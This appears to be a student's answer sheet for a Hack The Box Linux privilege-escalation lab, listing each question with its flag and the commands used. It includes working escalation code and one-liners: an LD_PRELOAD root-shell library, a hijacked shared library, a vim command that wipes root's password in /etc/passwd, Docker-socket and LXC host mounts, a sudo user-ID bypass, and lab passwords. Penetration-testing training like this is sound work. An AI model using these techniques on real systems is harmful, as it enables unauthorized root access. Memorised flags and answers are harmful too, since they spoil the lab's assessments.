Q: Enumerate the Linux environment and look for interesting files that might contain sensitive data. Submit the flag as the answer.
A: HTB{1nt3rn4l_5cr1p7_l34k}

Q: What is the latest Python version that is installed on the target?
A: 3.11
apt list --installed | tr "/" " " | cut -d" " -f1,3 | sed 's/[0-9]://g' | tee -a installed_pkgs.list

Q: Find the WordPress database password.
A: W0rdpr3ss_sekur1ty!
cat wp-config.php | grep 'DB_USER\|DB_PASSWORD'

Q: Review the PATH of the htb-student user. What non-default directory is part of the user's PATH?
A: /tmp
echo $PATH

Q: Use the privileged group rights of the secaudit user to locate a flag.
A: ch3ck_th0se_gr0uP_m3mb3erSh1Ps!
cd /var/log | grep -r "flag" .

Q: Use different approaches to escape the restricted shell and read the flag.txt file. Submit the contents as the answer.
A: HTB{35c4p3_7h3_r3stricted_5h311}
echo "$(<flag.txt )"

Q: Find a file with the setuid bit set that was not shown in the section command output (full path to the binary).
A: /bin/sed
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null

Q: Find a file with the setgid bit set that was not shown in the section command output (full path to the binary).
A: /usr/bin/facter
find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null

Q: What command can the htb-student user run as root?
A: /usr/bin/openssl
sudo -l

Q: Escalate the privileges using capabilities and read the flag.txt file in the "/root" directory. Submit its contents as the answer.
A: HTB{c4paBili7i3s_pR1v35c}
find /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin -type f -exec getcap {} \;
echo -e ':%s/^root:[^:]*:/root::/\nwq!' | /usr/bin/vim.basic -es /etc/passwd
su root

Q:  Connect to the target system and escalate privileges using the Screen exploit. Submit the contents of the flag.txt file in the /root/screen_exploit directory.
A: 91927dad55ffd22825660da88f2f92e0
echo "script" >exploit.sh
chmod +x exploit.sh
./exploit.sh

Q: Connect to the target system and escalate privileges by abusing the misconfigured cron job. Submit the contents of the flag.txt file in the /root/cron_abuse directory.
A: 14347a2c977eb84508d3d50691a7ac4b

Q:  Escalate the privileges and submit the contents of flag.txt as the answer.
A: HTB{C0nT41n3rs_uhhh}
lxc exec privesc /bin/sh
cat /mnt/root/root/flag.txt

Q: Escalate the privileges on the target and obtain the flag.txt in the root directory. Submit the contents as the answer.
A: HTB{D0ck3r_Pr1vE5c}
docker -H unix:///var/run/docker.sock run -v /:/mnt --rm -it ubuntu chroot /mnt bash
cat /root/flag.txt

Q: Escalate the privileges and submit the contents of flag.txt as the answer.
A: HTB{l0G_r0t7t73N_00ps}

Q: Review the NFS server's export list and find a directory holding a flag.
A: fc8c065b9384beaa162afe436a694acf
sudo mount -t nfs 10.129.2.210:/var/nfs/general /mnt2
cd /mnt2
ls -la
cat exports_flag.txt

Q: Escalate privileges using a different Kernel exploit. Submit the contents of the flag.txt file in the /root/kernel_exploit directory.
A: 46237b8aa523bc7e0365de09c0c0164f

Q: Escalate privileges using LD_PRELOAD technique. Submit the contents of the flag.txt file in the /root/ld_preload directory.
A: 6a9c151a599135618b8f09adc78ab5f1
#include <unistd.h>  // Include this header for setuid() and setgid() functions
#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
gcc -fPIC -shared -o root.so root.c -nostartfiles
mv root.so /tmp/root.so
sudo LD_PRELOAD=/tmp/root.so /usr/bin/openssl
cat /root/ld_preload/flag.txt

Q:  Follow the examples in this section to escalate privileges, recreate all examples (don't just run the payroll binary). Practice using ldd and readelf. Submit the version of glibc (i.e. 2.30) in use to move on to the next section.
A: 2.27
ldd /home/mrb3n/payroll
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h> // Include the header for setuid function

void dbquery() {
    printf("Malicious library loaded\n");
    setuid(0);
    system("/bin/sh -p");
}
gcc -shared -fPIC -o libexploit.so exploit.c
ldd --version


Q: Follow along with the examples in this section to escalate privileges. Try to practice hijacking python libraries through the various methods discussed. Submit the contents of flag.txt under the root user as the answer.
A: HTB{SuD0_e5c4l47i0n_1id}
sudo -l
sudo -u#-1 /bin/ncdu
cat /root/flag.txt

Q: Escalate the privileges and submit the contents of flag.txt as the answer.
A: HTB{p0Lk1tt3n}

Q: Escalate the privileges and submit the contents of flag.txt as the answer.
A: HTB{D1rTy_DiR7Y}

Q: Submit the contents of flag1.txt
A: LLPE{d0n_ov3rl00k_h1dden_f1les!}
Enumerate hidden files from user
find /home -type f -name '.*'
cat /home/htb-student/.config/.flag1.txt

Q: Submit the contents of flag2.txt
A: LLPE{ch3ck_th0se_cmd_l1nes!}
LinEnum
sshpass -p 'i_l0ve_s3cur1ty!' ssh barry_adm@dmz1.inlanefreight.local
ssh barry@<rhost> with i_l0ve_s3cur1ty!  as password


Q: Submit the contents of flag3.txt
A: LLPE{h3y_l00k_a_fl@g!}
Login as barry via SSH
cat /var/log/flag3.txt (found via .bash_history)

Q: Submit the contents of flag4.txt
A: LLPE{im_th3_m@nag3r_n0w}


Q: Submit the contents of flag5.txt
A: LLPE{0ne_sudo3r_t0_ru13_th3m_@ll!}
